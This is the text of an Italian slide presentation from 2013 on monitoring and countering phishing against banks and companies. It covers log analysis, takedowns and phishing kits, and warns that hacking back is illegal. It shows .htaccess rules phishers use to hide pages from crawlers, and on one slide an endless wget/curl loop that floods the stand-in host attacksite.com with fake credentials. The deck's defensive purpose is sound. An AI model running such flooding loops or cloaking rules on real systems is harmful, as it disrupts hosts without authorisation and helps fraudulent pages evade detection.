  • 15. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Previsioni, preveggenza, vaticinio ??? Denis Frati – D3Lab Www.d3lab.net
  • 16. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 monitoraggio Undergorund & cyber crime intelligence False pagine web on-line Attack spread Provenienza Profili utente Denis Frati – D3Lab Www.d3lab.net
  • 17. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio Undergorund & cyber crime intelligence Tra il dire ed il fare … sono necessari: ● ● ● ● ● ● ● struttura; risorse umane; tempo conoscenza degli “ambienti” storico: profili, attività, partecipazioni, conoscenze referenze; ecc; … non basta iscriversi ad un forum/blog underground, frequentare saltuariamente un canale irc su un server .ru Denis Frati – D3Lab Www.d3lab.net
  • 18. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio Presenza false pagine web on-line ● ● ● ● il phishing è dinamico, veloce! raramente sono presenti collegamenti a pagine web indicizzate; l'indicizzazione è spesso successiva alle prime segnalazioni di frode; il phisher conosce benissimo e usa: ➔ ➔ robot.txt; htaccess; User-agent: * Disallow: /folder1/ User-Agent: Googlebot Disallow: /folder2/ RewriteEngine On ... RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] RewriteCond %{HTTP_USER_AGENT} ^Googlebot RewriteRule ^.* - [F,L] Denis Frati – D3Lab Www.d3lab.net
  • 19. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio ATTACK spread ● falsificazione degli header della mail Notifica mancati recapiti ->WARNING un diluvio di notifiche che può anche mettere in crisi il web server Return-Path: <info@mycompany.it> ● invio massiccio di mail anche a indirizzi inesistenti sono necessari: ● monitoraggio data-base on line; ● mail box civetta; ● segnalatori (spesso i clienti verso filiali); … buongiorno ho visto la mail per il concorso, quello del bonus per la ricarica addestrare il personale a ricevere le segnalazioni … scusi mi avete scritto per un mio conto ...ma io non sono vostro cliente …. Denis Frati – D3Lab Www.d3lab.net Scusi?? mi spieghi bene, … …mi inoltri la mail, …può inviarmi il sorgente della mail?
  • 20. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio Monitorare la provenienza - 1 188.216.109.13 - - [25/May/2013:17:30:46 -0700] "GET /area_personale/login.php HTTP/1.1" 200 6820 "http://mycompany.victimsite.com.vn/area_personale/login.php" "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]" Source Ip address: 188.216.109.13 Data: [25/May/2013:17:30:46 -0700] Risorsa richiesta: "GET /area_personale/login.php HTTP/1.1" Risposta server: 200 6820 Referer: "http://mycompany.victimsite.com.vn/area_personale/login.php" User Agent: "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]" from http://httpd.apache.org/docs/2.2/logs.html la vittima viene rimandata a specifiche pagine legittime; noti i referer legittimi evidenzio richieste con referer non trusted (no IT, no *.mycompany.com, ecc..) Denis Frati – D3Lab Www.d3lab.net
  • 21. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Dal Monitoraggio al contrasto Attraverso Monitoraggio provenienza referer pericoloso su pagina login azioni di verifica diretta identifico cliente confronto profilo cliente ulteriori verifiche rilevo IP possibile vittima Frode ? Y fatto login ? N Y blocco account blocco operatività 1- test security company, curiosi, casuale, ecc 2- cliente che non prosegue con login Denis Frati – D3Lab Www.d3lab.net N Evento >> log.db
  • 22. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto Richieste shutdown Eliminare le pagine web fraudolente è imperativo, ma … … realisticamente i mezzi sono pochi! Si inoltrano le richieste a: ● gestori siti web; ● gestori server; ● hoster; ● fornitori connettività; Tuttavia permangono problemi dovuti a: ● orari, fusi orari e festività; ● difficoltà contatto; ● servizi whois privacy; ● incomprensioni linguistiche; ● diffidenza; Denis Frati – D3Lab Www.d3lab.net
  • 23. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Contrasto - Richieste shutdown – PLAYNG WITH redirect Denis Frati – D3Lab Www.d3lab.net
  • 24. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Contrasto - Richieste shutdown PLAYNG WITH DYNAMIC DNS & fake sub domain I servizi di DNS dinamico permettono al criminale di: ● creare domini con nomi ingannevoli; ● mantenere le strutture/pagine web al sicuro su proprie macchine connesse in rete via SIM card ● celare la reale posizione delle pagine - É necessario tracciare gli indirizzi IP correlati ai domini - intervenire • con corretti titolari degli IP • Fornitori servizio Dyn DNS Il criminale: ● aggredisce il sito A; ● accede al pannello digestione domini/DNS ● imposta subdomini con wild card; ● aggredisce il sito B ● inocula le pagine fraudolente ● dirotta su di esse i subdomini di A www.post4.it.sitobucato.com È necessario intervenire con tutte le parti: ● gestori dei siti A & B ● hoster dei siti A & B ● fornitori connettività A & B; Denis Frati – D3Lab Www.d3lab.net
  • 25. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto Credentials bombing Le credenziali rubate vengono: ● spedite via mail al criminale; ● scritte su file di testo (locali o remoti); ● scritte in db remoti; Ehi Cattivo?!?! Vuoi le credenziali ??? Eccole!! A=1 while [ $A -eq 1 ] do wget/curl http://attacksite.com/login.php?user&pass&pin done Denis Frati – D3Lab Www.d3lab.net
  • 26. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto Credentials search Se le credenziali sono scritte su file possono essere individuate !! Però lo sanno anche loro e le scrivono in /tmp che leggono via shell remote Denis Frati – D3Lab Www.d3lab.net
  • 27. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto kit search L'individuazione del kit mi consente di ● Sapere dove (presumibilmente) finiscono le credenziali; ● Profilare il possibile utilizzatore o autore del kit; ● Conoscere la propria pagina da monitorare nei log http per i referer non trusted; ● Conoscere le proprie risorse (immagini, applet flash, css, ecc...) usate dei criminali per bloccarle; Denis Frati – D3Lab Www.d3lab.net
  • 28. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto I WANT TO BE BAD! - 1 Hai trovato una shell remota!!! Grida di giubilio!! Puoi entrare e sderenarli!! Denis Frati – D3Lab Www.d3lab.net
  • 29. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto I WANT TO BE BAD! - 2 Ricorda: vuoi utilizzare exploit e shell remote come il phisher per contrastarlo? Commetti almeno un reato Art. 615 ter. C.p.(accesso abusivo a sistem informatico) se non due Art. 617 quinquies. C.p. (danneggiamento sistema informatico). E le responsabilità aziendali ?!?! Inoltre: le info eventualmente raccolte non sono “forensicaly sound” perché acquisiste in modo illecito! Denis Frati – D3Lab Www.d3lab.net
  • 30. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto I WANT TO BE BAD! - 3 Ricorda: puoi accedere (illecitamente) allo spazio usato dal criminale, cancellare i suoi file, le pagine web fraudolente, ma … … se la vulnerabilità che ha permesso l'accesso al criminale permane.. NON HAI RISOLTO MOLTO. È probabile un successivo riutilizzo a fini fraudolenti del sito /server perché la porta è ancora aperta! Denis Frati – D3Lab Www.d3lab.net
  • 31. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Monitoraggio & Analisi a tutto campo Basi del contrasto Un monitoraggio ampio e continuo permette: ● Rilevare cambi di modalità operativa; ● Individuare nuove piattaforme bersaglio per inoculazione; ● Conoscere nomi dei file di credenziali e delle shell remote; ● Individuare i kit; ● Riconoscere la “firma” degli autori e profilarli; ● Individuare nell'analisi attacchi a non clienti tracce di attacco a clienti; ● Ipotizzare possibili futuri enti bersaglio. Denis Frati – D3Lab Www.d3lab.net
  • 32. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Previsioni, preveggenza, vaticinio ??? Il monitoraggio a largo raggio fornisce indicazioni sugli orientamenti dei phisher: es. agosto 2012 rilavati attacchi a EDF (fornitore energia francese) Fine 2012 attacchi a Gruppo, Agip/Eni es. agosto 2012 attacchi BNP-PARIBAS (DE) Autunno 2012 attacchi BNP-PARIBAS (IT) Maggio 2013 attacchi BNP-PARIBAS (ES) es:fine 2012 attacchi Deteuche Bank IT 1° quadr. 2013 attacchi Deteuche Bank (DE) Phishing forecast: chi verrà attaccato nei prossimi giorni? www.denisfrati.it/s?forecast :O ← analisi log http siti dei phisher Denis Frati – D3Lab Www.d3lab.net
  • 33. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 contrasto formazione La (in)formazione del cliente può avere un buon ritorno di immagine, a costi contenuti. Gli avvisi sulle pagine web non li legge nessuno,ancor meno i deplian. La formazione degli utenti interni, dei dipendenti, porta solo sicurezza. Kevin Mitnick parlava di formazione aziendale a contrasto dall'ingegneria sociale già nel 2002 (l'arte dell'inganno). Denis Frati – D3Lab Www.d3lab.net
  • 34. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 domande Denis Frati – D3Lab Www.d3lab.net
  • 35. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013 Contatti: d3lab ~ $ whois denisfrati Registrant Info: Registrant: denis frati Mail address: info@d3lab.net Company: D3Lab Address: Ivrea (TO) – V. Jervis, 4 Phone: +39-0125-1963370 Fax: +39-0125-1963371 Compeny web site: www.d3lab.net Personal web site: www.denisfrati.it Expires on..............: never Last modified on........: 2012-02-20 Denis Frati – D3Lab Www.d3lab.net